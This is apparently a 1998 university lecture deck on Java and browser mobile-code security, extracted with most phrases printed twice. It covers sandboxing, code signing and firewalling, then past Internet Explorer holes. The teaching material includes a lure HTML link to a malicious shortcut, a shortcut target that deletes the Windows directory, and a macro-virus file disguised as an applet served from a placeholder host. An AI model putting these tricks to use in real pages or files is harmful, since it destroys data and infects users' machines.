Mobile ComputingMobile Computing

Copyright, 1996 © Dale Carnegie & Associates, Inc.

TIP For additional advice seeDale Carnegie Training® Presentation Guidelines

G22.3033.06 - LectureG22.3033.06 - Lecture

April 7th, 1998 April 7th, 1998

Mobile Code on the WebMobile Code on the Web

• ExecutablesExecutables

– stored on the clientstored on the client

– sent to clientsent to client

– interpreted in the browserinterpreted in the browser

• RisksRisks

– run native code on the machinerun native code on the machine• little of no protection in WIN95 or WIN98little of no protection in WIN95 or WIN98

• full user permission on UNIXfull user permission on UNIX

– access to file and network port connectionsaccess to file and network port connections

JAVAJAVA

• code can execute remotely and locallycode can execute remotely and locally

• client’s browser used to client’s browser used to

– display information and formsdisplay information and forms

– interpret (executable) code obtained in remote interpret (executable) code obtained in remote appletsapplets

• can create interactive web pagescan create interactive web pages

• allows for animation, games, and potential to run allows for animation, games, and potential to run unlimited remote applicationsunlimited remote applications

Problems with JAVAProblems with JAVA

• execution at client of general-purpose scriptexecution at client of general-purpose script

• enabling technology for the hackerenabling technology for the hacker

• ideal platform for ideal platform for

– stealing, modifying code or erasing informationstealing, modifying code or erasing information

– corrupting client machine and datacorrupting client machine and data

– malicious usersmalicious users

Types of AttackTypes of Attack

• integrityintegrity

– deletion / modification of filesdeletion / modification of files

– modifications of memory currently in usemodifications of memory currently in use

– killing processes / threadskilling processes / threads

• availabilityavailability

– allocating large amount of memoryallocating large amount of memory

– creating thousands of windowscreating thousands of windows

– creating high priority threads / processescreating high priority threads / processes

• disclosuredisclosure

– mailing information about client machine (ex. mailing information about client machine (ex. etc/passwdetc/passwd, private email), private email)

– sending personal or company files to an adversary over the networksending personal or company files to an adversary over the network

– using access to local machine to carry out timing attacksusing access to local machine to carry out timing attacks

• annoyanceannoyance

– displaying unwanted pictures on client screendisplaying unwanted pictures on client screen

– playing unwanted sounds on audio output deviceplaying unwanted sounds on audio output device

Securing Mobile CodeSecuring Mobile Code

• limit the priviledges of the executable (ex. limit the priviledges of the executable (ex. Sandbox model)Sandbox model)

• obtain asurance that source of executable is obtain asurance that source of executable is trustedtrusted

– code signing modelcode signing model

• limit the set of programs that can run on a client limit the set of programs that can run on a client based on executables propertiesbased on executables properties

– firewalling aproachfirewalling aproach

• proof-carrying codeproof-carrying code

TIP As appropriate, supplement

your presentation with technicalsupport data in hard copy

or on disc, e-mail, internet

Sandbox - JAVASandbox - JAVA

• goal is to limit access to: goal is to limit access to:

– file systemfile system

– ability to open connectionsability to open connections

– mail and other applicationsmail and other applications

• mechanisms in practice:mechanisms in practice:

– ClassLoaderClassLoader

– bytecode verifierbytecode verifier

– security managersecurity manager

ClassLoader and the Bytecode ClassLoader and the Bytecode VerifierVerifier

• ClassLoaderClassLoader

– loads local classesloads local classes

– loads and tags remote classesloads and tags remote classes

• bytecode verifier checks that remote code:bytecode verifier checks that remote code:

– that does forge pointersthat does forge pointers

– does not violate access restrictionsdoes not violate access restrictions

– accesses objects by correct typeaccesses objects by correct type

– accesses methods with correct argument typesaccesses methods with correct argument types

– contains no stack overflowcontains no stack overflow

Security ManagerSecurity Manager

• uses methods to check specific conditionsuses methods to check specific conditions

– check READ (check if a file is to be read)check READ (check if a file is to be read)

– check ACCEPT (check if a network connection can be check ACCEPT (check if a network connection can be accepted)accepted)

– etc.etc.

• provides flexible mechanism for conditionally allowing provides flexible mechanism for conditionally allowing access to resourcesaccess to resources

• allows sys admin to define flexible security policyallows sys admin to define flexible security policy

• such flexibility is dangerous (sys admins make mistakes)such flexibility is dangerous (sys admins make mistakes)

Code Signing ModelCode Signing Model

• checks list for entities it trustschecks list for entities it trusts

• executable content is signed by :executable content is signed by :

– a trusted entitya trusted entity

– an entity with a certificate signed by a trusted entityan entity with a certificate signed by a trusted entity

• real world example : ACTIVE - Xreal world example : ACTIVE - X

• hybrid scheme: hybrid scheme:

– signed code sections are loaded as local by signed code sections are loaded as local by classloaderclassloader

FirewallingFirewalling

• Finjan approachFinjan approach

– looks for characteristics in appletslooks for characteristics in applets

Similar to a virus checker, the Finjan approach uses this type of Similar to a virus checker, the Finjan approach uses this type of pattern-matchingpattern-matching

• playground approachplayground approach

– split applets into split applets into • graphics servergraphics server

• playground, where code actually executesplayground, where code actually executes

• communication via RMI (Remote Message Invocation)communication via RMI (Remote Message Invocation)

• commercial venture (ex. Digitivity)commercial venture (ex. Digitivity)

Timing AttackTiming Attack

• can use timing information to:can use timing information to:

– recover bit by bit of secret keyrecover bit by bit of secret key

– each encryption reveals a bit of the keyeach encryption reveals a bit of the key

– many existing implementations are vulnerable and many existing implementations are vulnerable and not likely to change soonnot likely to change soon

• remote java applet enable attack by gathering remote java applet enable attack by gathering timing data timing data

JAVA securityJAVA security

• JAVA is an exciting enabling technologyJAVA is an exciting enabling technology

• computer hackers might be the most excitedcomputer hackers might be the most excited

• policy decisions have to be made (ex. Allow file system policy decisions have to be made (ex. Allow file system access?)access?)

• policy decision may be difficult to enforce policy decision may be difficult to enforce

• greatest threat are bugs in:greatest threat are bugs in:

– codecode

– policy enforcementpolicy enforcement

– browserbrowser

– OSOS

Recent Hole in IERecent Hole in IE

• discovered by Paul Greenediscovered by Paul Greene

• coverage: CNN, NBC, CBS, InfoWorldcoverage: CNN, NBC, CBS, InfoWorld

• Microsoft posted a 400K patch within 48 hoursMicrosoft posted a 400K patch within 48 hours

– Why does this worry me?Why does this worry me?

• effects of attack are devastatingeffects of attack are devastating

• we are very lucky that the “good guys” found this we are very lucky that the “good guys” found this one firstone first

The settingThe setting

• WIN95 and WIN NT shortcutsWIN95 and WIN NT shortcuts

– basically symbolic linksbasically symbolic links

– stored in .LNK and .URL files depending on where stored in .LNK and .URL files depending on where they pointthey point

– contain relative or absolute path to executablescontain relative or absolute path to executables

• when a user clicks on (executes) a shortcut, the when a user clicks on (executes) a shortcut, the program it points to runsprogram it points to runs

The attackThe attack

• when a shortcut appears in a URL, shortcuts are when a shortcut appears in a URL, shortcuts are treated the same as local onestreated the same as local ones

• sample HTML on a pagesample HTML on a page

• <A HREF=“SEXY.LNK”> Click here for reward <A HREF=“SEXY.LNK”> Click here for reward </A></A>

• when a user clicks:when a user clicks:

– SEXY.LNK is downloaded to the machineSEXY.LNK is downloaded to the machine

– the thing pointed by SEXY.LNK executesthe thing pointed by SEXY.LNK executes

The ConsequenceThe Consequence

• Using WIN95, SEXY.LNK points to :Using WIN95, SEXY.LNK points to :

– c:\bin\mkdir c:\hahahahac:\bin\mkdir c:\hahahaha

– c:\bin\rmdir -p c:\windowsc:\bin\rmdir -p c:\windows

• batch files attacks executes FILE.BAT on clientbatch files attacks executes FILE.BAT on client

• basic attack allows bad guys to basic attack allows bad guys to

– download a pointer to any program on the machinedownload a pointer to any program on the machine

– include any argument to the programinclude any argument to the program

– executes it when you visit the pageexecutes it when you visit the page

• more dangerous for WIN95 because of paramsmore dangerous for WIN95 because of params

• THIS IS VERY SERIOUSTHIS IS VERY SERIOUS

MS Word Macro attack (on IE)MS Word Macro attack (on IE)

• due to Fellen and Balfanidue to Fellen and Balfani

• attacker creates FOO.DOT (with macro virus)attacker creates FOO.DOT (with macro virus)

• attacker renames the FOO.DOT to FOO.CLASSattacker renames the FOO.DOT to FOO.CLASS

• attacker adds FOO.CLASS to web serverattacker adds FOO.CLASS to web server

• attacker creates a web page that points to an applet named FOO.CLASSattacker creates a web page that points to an applet named FOO.CLASS

<applet codebase:”http://host.com/pub/”> code=foo.class </applet><applet codebase:”http://host.com/pub/”> code=foo.class </applet>

• the page is loadedthe page is loaded

• browser does not execute FOO.CLASS (applet format is wrong)browser does not execute FOO.CLASS (applet format is wrong)

• FOO.CLASS is now stored somewhere in the local cache - the browser redirects to the new pageFOO.CLASS is now stored somewhere in the local cache - the browser redirects to the new page

• the new page loads a “URL” of type “FILE”the new page loads a “URL” of type “FILE”

– the URL is the FOO.CLASS files which is now in the cache (the attacker can figure out what this is called)the URL is the FOO.CLASS files which is now in the cache (the attacker can figure out what this is called)

• browser recognize file as a MS WORD file andbrowser recognize file as a MS WORD file and

– launches MS WORD applicationlaunches MS WORD application

– macro virus executesmacro virus executes

Microsoft’s “fix” to both attacksMicrosoft’s “fix” to both attacks

• display a pop-up windowdisplay a pop-up window

– ““save to disk or open?”save to disk or open?”

– SAVE - postpone danger OPEN - it will executeSAVE - postpone danger OPEN - it will execute

1. Do users read pop-up windows?1. Do users read pop-up windows?

2. Do users pay attention to pop-up windows?2. Do users pay attention to pop-up windows?

3. Do users just click OK so they can continue?3. Do users just click OK so they can continue?

Answers: 1. NO 2. NO 3. YESAnswers: 1. NO 2. NO 3. YES

Types of FirewallsTypes of Firewalls

• basic firewall policy:basic firewall policy:

– insiders are goodinsiders are good

– ousiders are badousiders are bad

• basic JAVA policybasic JAVA policy

– bad outsiders can be kept under control bad outsiders can be kept under control

• basic problem when combining policybasic problem when combining policy

CryptographyCryptography

• not a silver bulletnot a silver bullet

• need good system implementations (ex. pick need good system implementations (ex. pick good primes)good primes)

• key managementkey management

• International Policy Agreement International Policy Agreement

• good, secure tokensgood, secure tokens